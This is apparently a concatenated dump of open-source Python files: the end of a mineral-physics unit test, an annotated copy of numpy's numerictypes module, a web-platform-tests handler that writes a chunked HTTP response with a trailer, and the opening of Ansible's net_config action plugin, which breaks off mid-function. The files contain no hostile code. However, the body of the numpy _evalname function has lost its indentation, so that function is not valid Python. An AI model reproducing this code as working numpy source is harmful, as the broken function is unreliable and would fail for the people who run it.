        # Molar mass shifts with P/T because the iron content is P/T-dependent.
        rock.set_state(7e9, 700)
        fractions, mins = rock.unroll()
        self.assertFloatEqual(mins[0].molar_mass(), 0.104161162508)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
haripradhan/MissionPlanner
|
refs/heads/master
|
Lib/site-packages/numpy/core/numerictypes.py
|
54
|
"""
numerictypes: Define the numeric type objects
This module is designed so "from numerictypes import \\*" is safe.
Exported symbols include:
Dictionary with all registered number types (including aliases):
typeDict
Type objects (not all will be available, depends on platform):
see variable sctypes for which ones you have
Bit-width names
int8 int16 int32 int64 int128
uint8 uint16 uint32 uint64 uint128
float16 float32 float64 float96 float128 float256
complex32 complex64 complex128 complex192 complex256 complex512
datetime64 timedelta64
c-based names
bool_
object_
void, str_, unicode_
byte, ubyte,
short, ushort
intc, uintc,
intp, uintp,
int_, uint,
longlong, ulonglong,
single, csingle,
float_, complex_,
longfloat, clongfloat,
datetime_, timedelta_, (these inherit from timeinteger which inherits
from signedinteger)
As part of the type-hierarchy: xx -- is bit-width
generic
+-> bool_ (kind=b)
+-> number (kind=i)
| integer
| signedinteger (intxx)
| byte
| short
| intc
| intp int0
| int_
| longlong
+-> unsignedinteger (uintxx) (kind=u)
| ubyte
| ushort
| uintc
| uintp uint0
| uint_
| ulonglong
+-> inexact
| +-> floating (floatxx) (kind=f)
| | single
| | float_ (double)
| | longfloat
| \\-> complexfloating (complexxx) (kind=c)
| csingle (singlecomplex)
| complex_ (cfloat, cdouble)
| clongfloat (longcomplex)
+-> flexible
| character
| void (kind=V)
|
| str_ (string_, bytes_) (kind=S) [Python 2]
| unicode_ (kind=U) [Python 2]
|
| bytes_ (string_) (kind=S) [Python 3]
| str_ (unicode_) (kind=U) [Python 3]
|
\\-> object_ (not used much) (kind=O)
"""
# we add more at the bottom
__all__ = ['sctypeDict', 'sctypeNA', 'typeDict', 'typeNA', 'sctypes',
'ScalarType', 'obj2sctype', 'cast', 'nbytes', 'sctype2char',
'maximum_sctype', 'issctype', 'typecodes', 'find_common_type',
'issubdtype']
from numpy.core.multiarray import typeinfo, ndarray, array, empty, dtype
import types as _types
import sys
# we don't export these for import *, but we do want them accessible
# as numerictypes.bool, etc.
from __builtin__ import bool, int, long, float, complex, object, unicode, str
from numpy.compat import bytes
if sys.version_info[0] >= 3:
    # Py3K: the builtin ``long`` no longer exists.  Define a private
    # stand-in so later code can reference ``long`` uniformly.
    class long(int):
        # Placeholder class -- this will not escape outside numerictypes.py
        pass
# String-handling utilities to avoid locale-dependence.
# Rather than paying for "import string", build the ASCII case-conversion
# tables directly ("A" = chr(65), "a" = chr(97)).
# list() is required so the result is sliceable on Python 3, where map()
# returns an iterator (slicing a map object raises TypeError); on Python 2
# map() already returns a list, so this is a no-op there.
_all_chars = list(map(chr, range(256)))
_ascii_upper = _all_chars[65:65+26]
_ascii_lower = _all_chars[97:97+26]
# 256-entry translation tables mapping each ordinal < 256 to its
# ASCII-only case fold; equivalent to
# string.maketrans(string.ascii_uppercase, string.ascii_lowercase)
# (and vice versa) but locale-independent.
LOWER_TABLE = "".join(_all_chars[:65] + _ascii_lower + _all_chars[65+26:])
UPPER_TABLE = "".join(_all_chars[:97] + _ascii_upper + _all_chars[97+26:])
def english_lower(s):
    """Apply English case rules to convert ASCII strings to all lower case.

    Locale-independent replacement for str.lower(): Turkish, for example,
    has distinct dotted and dotless variants of the Latin letter "I", so
    "I".lower() != "i" in a "tr" locale, which would corrupt type-name
    lookups.

    Parameters
    ----------
    s : str

    Returns
    -------
    lowered : str

    Examples
    --------
    >>> from numpy.core.numerictypes import english_lower
    >>> english_lower('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_')
    'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789_'
    >>> english_lower('')
    ''
    """
    return s.translate(LOWER_TABLE)
def english_upper(s):
    """Apply English case rules to convert ASCII strings to all upper case.

    Locale-independent replacement for str.upper(): Turkish, for example,
    has distinct dotted and dotless variants of the Latin letter "I", so
    "i".upper() != "I" in a "tr" locale, which would corrupt type-name
    lookups.

    Parameters
    ----------
    s : str

    Returns
    -------
    uppered : str

    Examples
    --------
    >>> from numpy.core.numerictypes import english_upper
    >>> english_upper('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_')
    'ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_'
    >>> english_upper('')
    ''
    """
    return s.translate(UPPER_TABLE)
def english_capitalize(s):
    """Upper-case the first character of an ASCII string, English rules.

    Locale-independent replacement for calls to str.capitalize().  Note
    that, unlike str.capitalize(), the remainder of the string is left
    untouched.

    Parameters
    ----------
    s : str

    Returns
    -------
    capitalized : str

    Examples
    --------
    >>> from numpy.core.numerictypes import english_capitalize
    >>> english_capitalize('int8')
    'Int8'
    >>> english_capitalize('Int8')
    'Int8'
    >>> english_capitalize('')
    ''
    """
    if not s:
        return s
    return english_upper(s[0]) + s[1:]
sctypeDict = {}      # Contains all leaf-node scalar types with aliases
sctypeNA = {}        # Contains all leaf-node types -> numarray type equivalences
allTypes = {}        # Collect the types we will add to the module here
def _evalname(name):
k = 0
for ch in name:
if ch in '0123456789':
break
k += 1
try:
bits = int(name[k:])
except ValueError:
bits = 0
base = name[:k]
return base, bits
def bitname(obj):
    """Return a bit-width name for a given type object"""
    # Produces (base, bits, char) for a scalar type object, e.g. the type
    # registered as INT32 yields ('int', 32, 'i4').  bits is 0 and char is
    # '' when they cannot be determined.
    name = obj.__name__
    base = ''
    char = ''
    if name[:6] == "numpy.":
        name = name[6:]
    try:
        # C-named types carry a trailing underscore (bool_, object_, ...);
        # strip it before looking the name up in the typeinfo table.
        if name[-1] == '_':
            newname = name[:-1]
        else:
            newname = name
        info = typeinfo[english_upper(newname)]
        assert(info[-1] == obj) # sanity check
        bits = info[2]
    except KeyError: # bit-width name
        base, bits = _evalname(name)
        char = base[0]
    # Fix up types whose char/base cannot be derived from the lookup above.
    if name == 'bool_':
        char = 'b'
        base = 'bool'
    elif name=='void':
        char = 'V'
        base = 'void'
    elif name=='object_':
        char = 'O'
        base = 'object'
        bits = 0
    # String/unicode naming differs between Python 2 and Python 3.
    if sys.version_info[0] >= 3:
        if name=='bytes_':
            char = 'S'
            base = 'bytes'
        elif name=='str_':
            char = 'U'
            base = 'str'
    else:
        if name=='string_':
            char = 'S'
            base = 'string'
        elif name=='unicode_':
            char = 'U'
            base = 'unicode'
    # Append the byte width to the character code (e.g. 'i' -> 'i4').
    bytes = bits // 8
    if char != '' and bytes != 0:
        char = "%s%d" % (char, bytes)
    return base, bits, char
def _add_types():
    # Populate allTypes/sctypeDict from multiarray's typeinfo table.
    for a in typeinfo.keys():
        name = english_lower(a)
        if isinstance(typeinfo[a], tuple):
            # Concrete type: the tuple's last element is the type object.
            typeobj = typeinfo[a][-1]
            # define C-name and insert typenum and typechar references also
            allTypes[name] = typeobj
            sctypeDict[name] = typeobj
            sctypeDict[typeinfo[a][0]] = typeobj
            sctypeDict[typeinfo[a][1]] = typeobj
        else: # generic class
            allTypes[name] = typeinfo[a]
_add_types()
def _add_aliases():
    # Register bit-width names (e.g. 'float64'), numarray-style capitalized
    # names (e.g. 'Float64') and character codes for each concrete type.
    # Integer types are handled separately by _add_integer_aliases().
    for a in typeinfo.keys():
        name = english_lower(a)
        if not isinstance(typeinfo[a], tuple):
            continue
        typeobj = typeinfo[a][-1]
        # insert bit-width version for this class (if relevant)
        base, bit, char = bitname(typeobj)
        if base[-3:] == 'int' or char[0] in 'ui': continue
        if base != '':
            myname = "%s%d" % (base, bit)
            # Do not let longdouble/clongdouble clobber an existing alias
            # of the same width (they may share a size with double).
            if (name != 'longdouble' and name != 'clongdouble') or \
               myname not in allTypes.keys():
                allTypes[myname] = typeobj
                sctypeDict[myname] = typeobj
            # numarray-style name: complex widths are given per component.
            if base == 'complex':
                na_name = '%s%d' % (english_capitalize(base), bit//2)
            elif base == 'bool':
                na_name = english_capitalize(base)
                sctypeDict[na_name] = typeobj
            else:
                na_name = "%s%d" % (english_capitalize(base), bit)
                sctypeDict[na_name] = typeobj
            sctypeNA[na_name] = typeobj
            sctypeDict[na_name] = typeobj
            sctypeNA[typeobj] = na_name
            sctypeNA[typeinfo[a][0]] = na_name
        if char != '':
            sctypeDict[char] = typeobj
            sctypeNA[char] = na_name
_add_aliases()
# Integers handled so that
# The int32, int64 types should agree exactly with
# PyArray_INT32, PyArray_INT64 in C
# We need to enforce the same checking as is done
# in arrayobject.h where the order of getting a
# bit-width match is:
# long, longlong, int, short, char
# for int8, int16, int32, int64, int128
def _add_integer_aliases():
    # Register intN/uintN plus the 'iN'/'uN' char-style and numarray
    # 'IntN'/'UIntN' aliases, preferring C types in the order above so the
    # aliases agree with the C-level PyArray_INT* definitions.
    _ctypes = ['LONG', 'LONGLONG', 'INT', 'SHORT', 'BYTE']
    for ctype in _ctypes:
        val = typeinfo[ctype]
        bits = val[2]
        charname = 'i%d' % (bits//8,)
        ucharname = 'u%d' % (bits//8,)
        intname = 'int%d' % bits
        UIntname = 'UInt%d' % bits
        Intname = 'Int%d' % bits
        uval = typeinfo['U'+ctype]
        typeobj = val[-1]
        utypeobj = uval[-1]
        if intname not in allTypes.keys():
            # First C type of a given width wins; later ones are skipped.
            uintname = 'uint%d' % bits
            allTypes[intname] = typeobj
            allTypes[uintname] = utypeobj
            sctypeDict[intname] = typeobj
            sctypeDict[uintname] = utypeobj
            sctypeDict[Intname] = typeobj
            sctypeDict[UIntname] = utypeobj
            sctypeDict[charname] = typeobj
            sctypeDict[ucharname] = utypeobj
            sctypeNA[Intname] = typeobj
            sctypeNA[UIntname] = utypeobj
            sctypeNA[charname] = typeobj
            sctypeNA[ucharname] = utypeobj
        sctypeNA[typeobj] = Intname
        sctypeNA[utypeobj] = UIntname
        sctypeNA[val[0]] = Intname
        sctypeNA[uval[0]] = UIntname
_add_integer_aliases()
# We use these later
void = allTypes.get('void')       # scalar type for raw, untyped data
generic = allTypes.get('generic') # root of the scalar-type hierarchy
#
# Rework the Python names (so that float and complex and int are consistent
# with Python usage)
#
def _set_up_aliases():
    # Map the numpy-conventional alias names onto the canonical C-named
    # types registered above, then drop entries that would shadow Python
    # builtins or stdlib module names.
    type_pairs = [('complex_', 'cdouble'),
                  ('int0', 'intp'),
                  ('uint0', 'uintp'),
                  ('single', 'float'),
                  ('csingle', 'cfloat'),
                  ('singlecomplex', 'cfloat'),
                  ('float_', 'double'),
                  ('intc', 'int'),
                  ('uintc', 'uint'),
                  ('int_', 'long'),
                  ('uint', 'ulong'),
                  ('cfloat', 'cdouble'),
                  ('longfloat', 'longdouble'),
                  ('clongfloat', 'clongdouble'),
                  ('longcomplex', 'clongdouble'),
                  ('bool_', 'bool'),
                  ('unicode_', 'unicode'),
                  ('object_', 'object'),
                  ('timedelta_', 'timedelta'),
                  ('datetime_', 'datetime')]
    # String/bytes aliases depend on the Python major version.
    if sys.version_info[0] >= 3:
        type_pairs.extend([('bytes_', 'string'),
                           ('str_', 'unicode'),
                           ('string_', 'string')])
    else:
        type_pairs.extend([('str_', 'string'),
                           ('string_', 'string'),
                           ('bytes_', 'string')])
    for alias, t in type_pairs:
        if t in allTypes:
            allTypes[alias] = allTypes[t]
        if t in sctypeDict:
            sctypeDict[alias] = sctypeDict[t]
    # Remove aliases overriding python types and modules
    to_remove = ['ulong', 'object', 'unicode', 'int', 'long', 'float',
                 'complex', 'bool', 'string', 'datetime', 'timedelta']
    if sys.version_info[0] >= 3:
        # Py3K
        to_remove.append('bytes')
        to_remove.append('str')
        to_remove.remove('unicode')
        to_remove.remove('long')
    for t in to_remove:
        try:
            del allTypes[t]
            del sctypeDict[t]
        except KeyError:
            pass
_set_up_aliases()
# Now, construct dictionary to lookup character codes from types
_sctype2char_dict = {}
def _construct_char_code_lookup():
    """Populate _sctype2char_dict with scalar type -> typechar entries."""
    for name, entry in typeinfo.items():
        # Abstract (generic) classes are not tuples and carry no char code.
        if not isinstance(entry, tuple):
            continue
        # 'p'/'P' are pointer-sized aliases of other integer types; skip
        # them so each scalar type maps to a single canonical character.
        if entry[0] not in ['p','P']:
            _sctype2char_dict[entry[-1]] = entry[0]
_construct_char_code_lookup()
# Registry of concrete scalar types grouped by kind; the int/uint/float/
# complex families are filled in by _set_array_types() below.
sctypes = {'int': [],
           'uint':[],
           'float':[],
           'complex':[],
           'others':[bool,object,str,unicode,void]}
def _add_array_type(typename, bits):
    """Append allTypes['<typename><bits>'] to sctypes[typename], if that
    width exists on the current platform (silently skip otherwise)."""
    key = '%s%d' % (typename, bits)
    try:
        sctype = allTypes[key]
    except KeyError:
        # This bit width is not available on this platform.
        pass
    else:
        sctypes[typename].append(sctype)
def _set_array_types():
    # Register every bit width that exists on this platform.
    ibytes = [1, 2, 4, 8, 16, 32, 64]
    fbytes = [2, 4, 8, 10, 12, 16, 32, 64]
    for bytes in ibytes:
        bits = 8*bytes
        _add_array_type('int', bits)
        _add_array_type('uint', bits)
    for bytes in fbytes:
        bits = 8*bytes
        _add_array_type('float', bits)
        # A complex number stores two floats of this width.
        _add_array_type('complex', 2*bits)
    # Ensure the pointer-sized integer type (dtype 'p'/'P') is present,
    # inserted in item-size order among the other integer types.
    _gi = dtype('p')
    if _gi.type not in sctypes['int']:
        indx = 0
        sz = _gi.itemsize
        _lst = sctypes['int']
        while (indx < len(_lst) and sz >= _lst[indx](0).itemsize):
            indx += 1
        sctypes['int'].insert(indx, _gi.type)
        sctypes['uint'].insert(indx, dtype('P').type)
_set_array_types()
# Scalar type names ordered from lowest to highest precision/generality.
# Not every name in this list exists on every platform.
genericTypeRank = ['bool', 'int8', 'uint8', 'int16', 'uint16',
                   'int32', 'uint32', 'int64', 'uint64', 'int128',
                   'uint128', 'float16',
                   'float32', 'float64', 'float80', 'float96', 'float128',
                   'float256',
                   'complex32', 'complex64', 'complex128', 'complex160',
                   'complex192', 'complex256', 'complex512', 'object']
def maximum_sctype(t):
    """
    Return the scalar type of highest precision of the same kind as the input.

    Parameters
    ----------
    t : dtype or dtype specifier
        The input data type. This can be a `dtype` object or an object that
        is convertible to a `dtype`.

    Returns
    -------
    out : dtype
        The highest precision data type of the same kind (`dtype.kind`) as `t`.

    See Also
    --------
    obj2sctype, mintypecode, sctype2char
    dtype

    Examples
    --------
    >>> np.maximum_sctype(np.int)
    <type 'numpy.int64'>
    >>> np.maximum_sctype(np.uint8)
    <type 'numpy.uint64'>
    >>> np.maximum_sctype(np.complex)
    <type 'numpy.complex192'>
    >>> np.maximum_sctype(str)
    <type 'numpy.string_'>
    >>> np.maximum_sctype('i2')
    <type 'numpy.int64'>
    >>> np.maximum_sctype('f4')
    <type 'numpy.float96'>
    """
    sctype = obj2sctype(t)
    if sctype is None:
        # Not convertible to a scalar type: hand the input back unchanged.
        return t
    base, bits = _evalname(sctype.__name__)
    if bits == 0:
        # No bit-width suffix (e.g. object_, str_): nothing wider exists.
        return sctype
    # sctypes[base] lists widths in increasing order; take the widest.
    return sctypes[base][-1]
try:
    buffer_type = _types.BufferType
except AttributeError:
    # Py3K
    buffer_type = memoryview
# Mapping from builtin Python types to the name of the matching scalar type.
_python_types = {int : 'int_',
                 float: 'float_',
                 complex: 'complex_',
                 bool: 'bool_',
                 bytes: 'bytes_',
                 unicode: 'unicode_',
                 buffer_type: 'void',
                }
if sys.version_info[0] >= 3:
    def _python_type(t):
        """returns the type corresponding to a certain Python type"""
        # Accept either a type or an instance; unknown types map to object_.
        if not isinstance(t, type):
            t = type(t)
        return allTypes[_python_types.get(t, 'object_')]
else:
    def _python_type(t):
        """returns the type corresponding to a certain Python type"""
        # Python 2 spelling: old-style classes are not instances of `type`,
        # so check against types.TypeType instead.
        if not isinstance(t, _types.TypeType):
            t = type(t)
        return allTypes[_python_types.get(t, 'object_')]
def issctype(rep):
    """
    Determines whether the given object represents a scalar data-type.

    Parameters
    ----------
    rep : any
        If `rep` is an instance of a scalar dtype, True is returned. If not,
        False is returned.

    Returns
    -------
    out : bool
        Boolean result of check whether `rep` is a scalar dtype.

    See Also
    --------
    issubsctype, issubdtype, obj2sctype, sctype2char

    Examples
    --------
    >>> np.issctype(np.int32)
    True
    >>> np.issctype(list)
    False
    >>> np.issctype(1.1)
    False
    """
    if not isinstance(rep, (type, dtype)):
        return False
    try:
        res = obj2sctype(rep)
        if res and res != object_:
            return True
        return False
    except Exception:
        # obj2sctype may fail on exotic inputs; treat any such failure as
        # "not a scalar type".  A bare ``except:`` here would also swallow
        # KeyboardInterrupt and SystemExit, which must propagate.
        return False
def obj2sctype(rep, default=None):
    """Return the scalar type object corresponding to `rep`.

    Accepts generic subclasses, dtype objects, Python types, ndarrays and
    anything convertible to a dtype; returns `default` when `rep` cannot
    be interpreted as a scalar type.
    """
    try:
        if issubclass(rep, generic):
            return rep
    except TypeError:
        # rep is not a class at all; fall through to the other checks.
        pass
    if isinstance(rep, dtype):
        return rep.type
    if isinstance(rep, type):
        return _python_type(rep)
    if isinstance(rep, ndarray):
        return rep.dtype.type
    try:
        res = dtype(rep)
    except Exception:
        # dtype() raises TypeError/ValueError for unconvertible inputs; a
        # bare ``except:`` would also trap KeyboardInterrupt/SystemExit.
        return default
    return res.type
def issubclass_(arg1, arg2):
    """Like the builtin ``issubclass``, but returns False instead of
    raising TypeError when `arg1` is not a class."""
    try:
        result = issubclass(arg1, arg2)
    except TypeError:
        result = False
    return result
def issubsctype(arg1, arg2):
    """
    Determine if the first argument is a subclass of the second argument.

    Parameters
    ----------
    arg1, arg2 : dtype or dtype specifier
        Data-types.

    Returns
    -------
    out : bool
        The result.

    See Also
    --------
    issctype, issubdtype, obj2sctype

    Examples
    --------
    >>> np.issubsctype('S8', str)
    True
    >>> np.issubsctype(np.array([1]), np.int)
    True
    >>> np.issubsctype(np.array([1]), np.float)
    False
    """
    # Normalize both arguments to scalar type objects before comparing.
    first = obj2sctype(arg1)
    second = obj2sctype(arg2)
    return issubclass(first, second)
def issubdtype(arg1, arg2):
    """
    Returns True if first argument is a typecode lower/equal in type hierarchy.

    Parameters
    ----------
    arg1, arg2 : dtype_like
        dtype or string representing a typecode.

    Returns
    -------
    out : bool

    See Also
    --------
    issubsctype, issubclass_
    numpy.core.numerictypes : Overview of numpy type hierarchy.

    Examples
    --------
    >>> np.issubdtype('S1', str)
    True
    >>> np.issubdtype(np.float64, np.float32)
    False
    """
    if issubclass_(arg2, generic):
        # arg2 is already a scalar-type class: compare against it directly.
        return issubclass(dtype(arg1).type, arg2)
    # Otherwise compare against the abstract parent of arg2's scalar type
    # (the first entry of the MRO after the concrete class itself).
    mro = dtype(arg2).type.mro()
    if len(mro) > 1:
        val = mro[1]
    else:
        val = mro[0]
    return issubclass(dtype(arg1).type, val)
# This dictionary allows look up based on any alias for an array data-type
class _typedict(dict):
    """
    Base object for a dictionary for look-up with any alias for an array dtype.

    Instances of `_typedict` can not be used as dictionaries directly,
    first they have to be populated.
    """
    def __getitem__(self, obj):
        # Normalize the key to its canonical scalar type before lookup, so
        # e.g. 'i4', an int32 class and dtype('int32') all hit one entry.
        return dict.__getitem__(self, obj2sctype(obj))
# Per-type lookup tables, keyed through _typedict so any alias works.
nbytes = _typedict()      # item size in bytes
_alignment = _typedict()  # required alignment in bytes
_maxvals = _typedict()    # maximum representable value (None if not listed)
_minvals = _typedict()    # minimum representable value (None if not listed)
def _construct_lookups():
    """Fill the size/alignment/min/max tables from multiarray's typeinfo."""
    # items() works on both Python 2 and 3; the original iteritems() call
    # is Python-2-only and broke the Py3 code paths this module otherwise
    # supports (on Python 2, items() iterates the same pairs).
    for name, val in typeinfo.items():
        if not isinstance(val, tuple):
            # Abstract classes carry no size/range information.
            continue
        obj = val[-1]
        nbytes[obj] = val[2] // 8
        _alignment[obj] = val[3]
        if (len(val) > 5):
            _maxvals[obj] = val[4]
            _minvals[obj] = val[5]
        else:
            _maxvals[obj] = None
            _minvals[obj] = None
_construct_lookups()
def sctype2char(sctype):
    """
    Return the string representation of a scalar dtype.

    Parameters
    ----------
    sctype : scalar dtype or object
        If a scalar dtype, the corresponding string character is
        returned. If an object, `sctype2char` tries to infer its scalar type
        and then return the corresponding string character.

    Returns
    -------
    typechar : str
        The string character corresponding to the scalar type.

    Raises
    ------
    ValueError
        If `sctype` is an object for which the type can not be inferred.

    See Also
    --------
    obj2sctype, issctype, issubsctype, mintypecode

    Examples
    --------
    >>> for sctype in [np.int32, np.float, np.complex, np.string_, np.ndarray]:
    ...     print np.sctype2char(sctype)
    l
    d
    D
    S
    O

    >>> x = np.array([1., 2-1.j])
    >>> np.sctype2char(x)
    'D'
    >>> np.sctype2char(list)
    'O'
    """
    sctype = obj2sctype(sctype)
    if sctype is None:
        # Call-style raise: the original ``raise ValueError, "..."`` is a
        # SyntaxError on Python 3, which this module otherwise supports;
        # this form is valid on both Python 2 and 3.
        raise ValueError("unrecognized type")
    return _sctype2char_dict[sctype]
# Create dictionary of casting functions that wrap sequences
# indexed by type or type character
cast = _typedict()
try:
    # Python 2: enumerate the scalar-compatible builtins via the types module.
    ScalarType = [_types.IntType, _types.FloatType, _types.ComplexType,
                  _types.LongType, _types.BooleanType,
                  _types.StringType, _types.UnicodeType, _types.BufferType]
except AttributeError:
    # Py3K
    ScalarType = [int, float, complex, long, bool, bytes, str, memoryview]
ScalarType.extend(_sctype2char_dict.keys())
ScalarType = tuple(ScalarType)
# Each cast entry coerces a sequence to an array of the keyed scalar type.
# The k=key default binds the loop variable at definition time (avoiding
# the late-binding closure pitfall).
for key in _sctype2char_dict.keys():
    cast[key] = lambda x, k=key : array(x, copy=False).astype(k)
# Create the typestring lookup dictionary
_typestr = _typedict()
for key in _sctype2char_dict.keys():
    if issubclass(key, allTypes['flexible']):
        # Flexible types (string/unicode/void) have no fixed item size; use
        # the bare character code.
        _typestr[key] = _sctype2char_dict[key]
    else:
        # e.g. 'i4': character code plus byte width, read off a dummy array.
        _typestr[key] = empty((1,),key).dtype.str[1:]
# Make sure all typestrings are in sctypeDict
for key, val in _typestr.items():
    if val not in sctypeDict:
        sctypeDict[val] = key
# Add additional strings to the sctypeDict
if sys.version_info[0] >= 3:
    _toadd = ['int', 'float', 'complex', 'bool', 'object',
              'str', 'bytes', 'object', ('a', allTypes['bytes_'])]
else:
    _toadd = ['int', 'float', 'complex', 'bool', 'object', 'string',
              ('str', allTypes['string_']),
              'unicode', 'object', ('a', allTypes['string_'])]
for name in _toadd:
    if isinstance(name, tuple):
        # Explicit (alias, type) pair.
        sctypeDict[name[0]] = name[1]
    else:
        # Plain name: alias it to the trailing-underscore type, if present.
        key = '%s_' % name
        if key in allTypes:
            sctypeDict[name] = allTypes['%s_' % name]
del _toadd, name
# Now add the types we've determined to this module
for key in allTypes:
    globals()[key] = allTypes[key]
    __all__.append(key)
del key
# Character codes grouped by category (for dtype.char membership checks).
typecodes = {'Character':'c',
             'Integer':'bhilqp',
             'UnsignedInteger':'BHILQP',
             'Float':'fdg',
             'Complex':'FDG',
             'AllInteger':'bBhHiIlLqQpP',
             'AllFloat':'fdgFDG',
             'Datetime': 'Mm',
             'All':'?bhilqpBHILQPfdgFDGSUVOMm'}
# backwards compatibility --- deprecated name
typeDict = sctypeDict
typeNA = sctypeNA
# b -> boolean
# u -> unsigned integer
# i -> signed integer
# f -> floating point
# c -> complex
# M -> datetime
# m -> timedelta
# S -> string
# U -> Unicode string
# V -> record
# O -> Python object
# Kind characters in the order used by find_common_type's kind comparison.
_kind_list = ['b', 'u', 'i', 'f', 'c', 'S', 'U', 'V', 'O', 'M', 'm']
# Typecode ladder searched when coercing: integers (minus the pointer-size
# aliases 'p'/'P'), then floats/complex, then object.
__test_types = typecodes['AllInteger'][:-2]+typecodes['AllFloat']+'O'
__len_test_types = len(__test_types)
# Keep incrementing until a common type both can be coerced to
# is found. Otherwise, return None
def _find_common_coerce(a, b):
    """Smallest dtype (searching upward from `a` on the typecode ladder)
    that both `a` and `b` can be safely cast to, or None."""
    # Cheapest case: a already dominates b.
    if a > b:
        return a
    try:
        start_index = __test_types.index(a.char)
    except ValueError:
        # a's typecode is outside the searchable ladder; no answer.
        return None
    return _can_coerce_all([a, b], start=start_index)
# Find a data-type that all data-types in a list can be coerced to
def _can_coerce_all(dtypelist, start=0):
    """Return the first test dtype (at ladder position >= `start`) that
    every entry of `dtypelist` can be safely cast to, or None."""
    count = len(dtypelist)
    if count == 0:
        return None
    if count == 1:
        # A single dtype trivially coerces to itself.
        return dtypelist[0]
    for pos in range(start, __len_test_types):
        candidate = dtype(__test_types[pos])
        coercible = [x for x in dtypelist if candidate >= x]
        if len(coercible) == count:
            return candidate
    return None
def find_common_type(array_types, scalar_types):
    """
    Determine common type following standard coercion rules.

    Parameters
    ----------
    array_types : sequence
        A list of dtypes or dtype convertible objects representing arrays.
    scalar_types : sequence
        A list of dtypes or dtype convertible objects representing scalars.

    Returns
    -------
    datatype : dtype
        The common data type, which is the maximum of `array_types` ignoring
        `scalar_types`, unless the maximum of `scalar_types` is of a
        different kind (`dtype.kind`). If the kind is not understood, then
        None is returned.

    See Also
    --------
    dtype, common_type, can_cast, mintypecode

    Examples
    --------
    >>> np.find_common_type([], [np.int64, np.float32, np.complex])
    dtype('complex128')
    >>> np.find_common_type([np.int64, np.float32], [])
    dtype('float64')

    The standard casting rules ensure that a scalar cannot up-cast an
    array unless the scalar is of a fundamentally different kind of data
    (i.e. under a different hierarchy in the data type hierarchy) then
    the array:

    >>> np.find_common_type([np.float32], [np.int64, np.float64])
    dtype('float32')

    Complex is of a different type, so it up-casts the float in the
    `array_types` argument:

    >>> np.find_common_type([np.float32], [np.complex])
    dtype('complex128')

    Type specifier strings are convertible to dtypes and can therefore
    be used instead of dtypes:

    >>> np.find_common_type(['f4', 'f4', 'i4'], ['c8'])
    dtype('complex128')

    """
    array_types = [dtype(t) for t in array_types]
    scalar_types = [dtype(t) for t in scalar_types]
    maxa = _can_coerce_all(array_types)
    maxsc = _can_coerce_all(scalar_types)
    # If either side is empty/uncoercible, the other side wins outright.
    if maxa is None:
        return maxsc
    if maxsc is None:
        return maxa
    try:
        index_a = _kind_list.index(maxa.kind)
        index_sc = _kind_list.index(maxsc.kind)
    except ValueError:
        # An unknown kind character: give up.
        return None
    # Scalars only up-cast the array type when they are of a
    # "later" kind in _kind_list.
    if index_sc > index_a:
        return _find_common_coerce(maxsc, maxa)
    return maxa
|
jxs/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/XMLHttpRequest/resources/chunked.py
|
219
|
def main(request, response):
    """Serve a fixed series of chunks with chunked transfer-encoding,
    terminated by a zero-length chunk and an X-Test-Me trailer."""
    chunks = [
        "First chunk\r\n",
        "Second chunk\r\n",
        "Yet another (third) chunk\r\n",
        "Yet another (fourth) chunk\r\n",
    ]
    response.headers.set("Transfer-Encoding", "chunked")
    response.headers.set("Trailer", "X-Test-Me")
    response.headers.set("Content-Type", "text/plain")
    response.write_status_headers()
    writer = response.writer
    for chunk in chunks:
        # Each chunk: hex payload length, CRLF, payload, CRLF.
        writer.write("%x\r\n" % len(chunk))
        writer.write(chunk)
        writer.write("\r\n")
    # Zero-length chunk ends the body; the trailer header follows.
    writer.write("0\r\n")
    writer.write("X-Test-Me: Trailer header value\r\n\r\n")
|
noroutine/ansible
|
refs/heads/devel
|
lib/ansible/plugins/action/net_config.py
|
137
|
#
# Copyright 2015 Peter Sprygada <psprygada@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import re
import time
import glob
from ansible.plugins.action.normal import ActionModule as _ActionModule
from ansible.module_utils._text import to_text
from ansible.module_utils.six.moves.urllib.parse import urlsplit
from ansible.utils.vars import merge_hash
PRIVATE_KEYS_RE = re.compile('__.+__')
class ActionModule(_ActionModule):
    """Action plugin for net_config: renders an optional `src` template
    before module execution and stores device backups on the controller."""

    def run(self, tmp=None, task_vars=None):
        """Render the template (when `src` is given), run the underlying
        module, write any requested backup, and strip private keys."""
        if self._task.args.get('src'):
            try:
                self._handle_template()
            except ValueError as exc:
                # `exc.message` exists only on Python 2; to_text() works on
                # both Python versions.
                return dict(failed=True, msg=to_text(exc))
        result = super(ActionModule, self).run(tmp, task_vars)
        if self._task.args.get('backup') and result.get('__backup__'):
            # User requested backup and no error occurred in module.
            # NOTE: If there is a parameter error, _backup key may not be in results.
            filepath = self._write_backup(task_vars['inventory_hostname'],
                                          result['__backup__'])
            result['backup_path'] = filepath
        # strip out any keys that have two leading and two trailing
        # underscore characters.  Iterate over a snapshot of the keys:
        # deleting from a dict while iterating its view raises
        # RuntimeError on Python 3.
        for key in list(result.keys()):
            if PRIVATE_KEYS_RE.match(key):
                del result[key]
        return result

    def _get_working_path(self):
        """Return the role path when running inside a role, otherwise the
        playbook base directory."""
        cwd = self._loader.get_basedir()
        if self._task._role is not None:
            cwd = self._task._role._role_path
        return cwd

    def _write_backup(self, host, contents):
        """Write `contents` to ./backup/<host>_config.<timestamp>, removing
        any previous backups for the same host, and return the path."""
        backup_path = self._get_working_path() + '/backup'
        if not os.path.exists(backup_path):
            os.mkdir(backup_path)
        for fn in glob.glob('%s/%s*' % (backup_path, host)):
            os.remove(fn)
